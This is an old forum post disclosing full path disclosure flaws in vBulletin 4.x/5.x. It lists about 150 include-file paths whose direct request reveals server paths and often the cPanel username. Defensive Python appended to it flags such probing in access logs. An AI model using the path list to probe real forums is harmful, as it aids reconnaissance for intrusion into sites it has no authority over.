
  #142  
17.12.2012, 02:13
n0n@me
Newbie
Registered: 19.02.2010
Posts: 1
Time on forum: 12389

Reputation: 6

vBulletin 4.2.0 Full Path Disclosure Vulnerability

Code:
The Full Path Disclosure is in vBulletin 4.2.0, in forumrunner. With Full Path Disclosure you can get the path to the forum you're in and also (most of the time it is the same) cpanel's username.
To see it go to: http://[path]/forumrunner/include/album.php
It works in 90% of the forums.

Example: 
vBulletin 4.x/5.x multiple Full Path Disclosure Vuln

Code:
/includes/api/commonwhitelist_2.php 
/includes/api/commonwhitelist_5.php 
/includes/api/commonwhitelist_6.php 
/includes/api/1/album_album.php 
/includes/api/1/album_editalbum.php 
/includes/api/1/album_latest.php 
/includes/api/1/album_overview.php 
/includes/api/1/album_picture.php 
/includes/api/1/album_user.php 
/includes/api/1/announcement_edit.php 
/includes/api/1/announcement_view.php 
/includes/api/1/api_cmscategorylist.php 
/includes/api/1/api_cmssectionlist.php 
/includes/api/1/api_forumlist.php 
/includes/api/1/api_getnewtop.php 
/includes/api/1/api_getsecuritytoken.php 
/includes/api/1/api_getsessionhash.php 
/includes/api/1/api_init.php 
/includes/api/1/api_mobilepublisher.php 
/includes/api/1/api_usersearch.php 
/includes/api/1/blog_blog.php 
/includes/api/1/blog_bloglist.php 
/includes/api/1/blog_comments.php 
/includes/api/1/blog_custompage.php 
/includes/api/1/blog_dosendtofriend.php 
/includes/api/1/blog_list.php 
/includes/api/1/blog_members.php 
/includes/api/1/blog_post_comment.php 
/includes/api/1/blog_post_editblog.php 
/includes/api/1/blog_post_editcomment.php 
/includes/api/1/blog_post_edittrackback.php 
/includes/api/1/blog_post_newblog.php 
/includes/api/1/blog_post_postcomment.php 
/includes/api/1/blog_post_updateblog.php 
/includes/api/1/blog_sendtofriend.php 
/includes/api/1/blog_subscription_entrylist.php 
/includes/api/1/blog_subscription_userlist.php 
/includes/api/1/blog_usercp_addcat.php 
/includes/api/1/blog_usercp_editcat.php 
/includes/api/1/blog_usercp_editoptions.php 
/includes/api/1/blog_usercp_editprofile.php 
/includes/api/1/blog_usercp_modifycat.php 
/includes/api/1/blog_usercp_updateprofile.php 
/includes/api/1/editpost_editpost.php 
/includes/api/1/editpost_updatepost.php 
/includes/api/1/forum.php 
/includes/api/1/forumdisplay.php 
/includes/api/1/inlinemod_domergeposts.php 
/includes/api/1/list.php 
/includes/api/1/login_lostpw.php 
/includes/api/1/member.php 
/includes/api/1/memberlist_search.php 
/includes/api/1/misc_showattachments.php 
/includes/api/1/misc_whoposted.php 
/includes/api/1/newreply_newreply.php 
/includes/api/1/newreply_postreply.php 
/includes/api/1/newthread_postthread.php 
/includes/api/1/newthread_newthread.php 
/includes/api/1/poll_newpoll.php 
/includes/api/1/poll_polledit.php 
/includes/api/1/poll_showresults.php 
/includes/api/1/private_editfolders.php
/includes/api/1/private_insertpm.php 
/includes/api/1/private_messagelist.php 
/includes/api/1/private_newpm.php 
/includes/api/1/private_showpm.php 
/includes/api/1/private_trackpm.php 
/includes/api/1/profile_editattachments.php 
/includes/api/1/profile_editoptions.php 
/includes/api/1/profile_editprofile.php 
/includes/api/1/register_addmember.php 
/includes/api/1/register_checkdate.php 
/includes/api/1/search_process.php 
/includes/api/1/search_showresults.php 
/includes/api/1/showthread.php 
/includes/api/1/subscription_addsubscription.php 
/includes/api/1/subscription_editfolders.php 
/includes/api/1/subscription_viewsubscription.php 
/includes/api/1/threadtag_managetags.php 
/includes/api/2/album_picture.php 
/includes/api/2/api_blogcategorylist.php 
/includes/api/2/blog_blog.php 
/includes/api/2/blog_bloglist.php 
/includes/api/2/blog_list.php 
/includes/api/2/blog_subscription_entrylist.php 
/includes/api/2/blog_subscription_userlist.php 
/includes/api/2/blog_usercp_groups.php 
/includes/api/2/content.php 
/includes/api/2/editpost_editpost.php 
/includes/api/2/forumdisplay.php 
/includes/api/2/member.php 
/includes/api/2/newreply_newreply.php 
/includes/api/2/forum.php 
/includes/api/2/poll_newpoll.php 
/includes/api/2/poll_polledit.php 
/includes/api/2/poll_showresults.php 
/includes/api/2/private_messagelist.php 
/includes/api/2/private_trackpm.php 
/includes/api/2/profile_editattachments.php 
/includes/api/2/search_showresults.php 
/includes/api/2/showthread.php 
/includes/api/3/api_gotonewpost.php 
/includes/api/4/album_user.php 
/includes/api/4/api_forumlist.php 
/includes/api/4/api_getnewtop.php 
/includes/api/4/breadcrumbs_create.php 
/includes/api/4/facebook_getforumid.php 
/includes/api/4/facebook_getnewforummembers.php 
/includes/api/4/get_vbfromfacebook.php 
/includes/api/4/login_facebook.php 
/includes/api/4/newreply_postreply.php 
/includes/api/4/newthread_postthread.php 
/includes/api/4/register.php 
/includes/api/4/register_addmember.php 
/includes/api/4/search_findusers.php 
/includes/api/4/subscription_viewsubscription.php 
/includes/api/5/api_init.php 
/includes/api/6/api_getnewtop.php 
/includes/api/6/api_gotonewpost.php 
/includes/api/6/content.php 
/includes/api/6/member.php 
/includes/api/6/newthread_newthread.php 
/includes/block/blogentries.php 
/includes/block/cmsarticles.php 
/includes/block/html.php 
/includes/block/newposts.php 
/includes/block/sgdiscussions.php 
/includes/block/tagcloud.php 
/includes/block/threads.php 
/forumrunner/include/subscriptions.php 
/forumrunner/include/search_forum.php 
/forumrunner/include/profile.php 
/forumrunner/include/post.php 
/forumrunner/include/pms.php 
/forumrunner/include/online.php 
/forumrunner/include/moderation.php 
/forumrunner/include/misc.php 
/forumrunner/include/login.php 
/forumrunner/include/get_thread.php 
/forumrunner/include/get_forum.php 
/forumrunner/include/cms.php 
/forumrunner/include/attach.php 
/forumrunner/include/announcement.php 
/forumrunner/include/album.php 
/forumrunner/support/vbulletin_methods.php 
/forumrunner/support/stringparser_bbcode.class.php 
/forumrunner/support/utils.php 
/forumrunner/support/other_methods.php 
/packages/skimlinks/hooks/postbit_display_complete.php 
/packages/skimlinks/hooks/showthread_complete.php 
/packages/skimlinks/hooks/userdata_start.php
//...Leaked bY beBoss..//
 
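As an added example (not part of the original post or of vBulletin), the following Python runs over web-server access-log lines and flags direct requests to the include directories listed above, so a forum operator can see whether those files are being enumerated and whether the server still answers them with 200 instead of a deny. The directory prefixes come from the path list in the post; the log lines are constructed samples.

```python
import re

# Directory prefixes under which the advisory above lists directly requestable PHP files.
DIRECT_INCLUDE_PREFIXES = (
    "/includes/api/", "/includes/block/", "/forumrunner/include/",
    "/forumrunner/support/", "/packages/skimlinks/hooks/",
)

# Combined log format as written by Apache/nginx; only the fields needed here are captured.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) '
)

def is_direct_include_request(path):
    """True when a PHP file under one of the include directories is requested directly."""
    return path.endswith(".php") and path.startswith(DIRECT_INCLUDE_PREFIXES)

def find_direct_include_hits(lines):
    """Return (ip, path, status) for every direct include request found in the log lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                                  # not in combined log format
        path = m.group("path").split("?", 1)[0]       # drop the query string
        if is_direct_include_request(path):
            hits.append((m.group("ip"), path, int(m.group("status"))))
    return hits

def unblocked_paths(hits):
    """Include files the server answered with 200: no deny rule covers them, so a PHP
    error page carrying the filesystem path was most likely returned."""
    return sorted({path for _, path, status in hits if status == 200})

def probing_sources(hits, threshold=3):
    """Clients that touched at least `threshold` distinct include files (systematic enumeration)."""
    per_ip = {}
    for ip, path, _ in hits:
        per_ip.setdefault(ip, set()).add(path)
    return sorted(ip for ip, paths in per_ip.items() if len(paths) >= threshold)

# Constructed sample lines using documentation IP ranges, not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [17/Dec/2012:02:13:00 +0000] "GET /forumrunner/include/album.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [17/Dec/2012:02:13:01 +0000] "GET /includes/api/1/api_init.php HTTP/1.1" 200 498',
    '198.51.100.7 - - [17/Dec/2012:02:13:02 +0000] "GET /includes/block/html.php?x=1 HTTP/1.1" 200 503',
    '203.0.113.9 - - [17/Dec/2012:02:14:00 +0000] "GET /showthread.php?t=12 HTTP/1.1" 200 18342',
    '203.0.113.9 - - [17/Dec/2012:02:14:05 +0000] "GET /forumrunner/include/misc.php HTTP/1.1" 403 210',
]
```

Any path reported by `unblocked_paths` is one the web server should be denying (or PHP should be answering with `display_errors` off); a client in `probing_sources` is walking the list rather than using the forum.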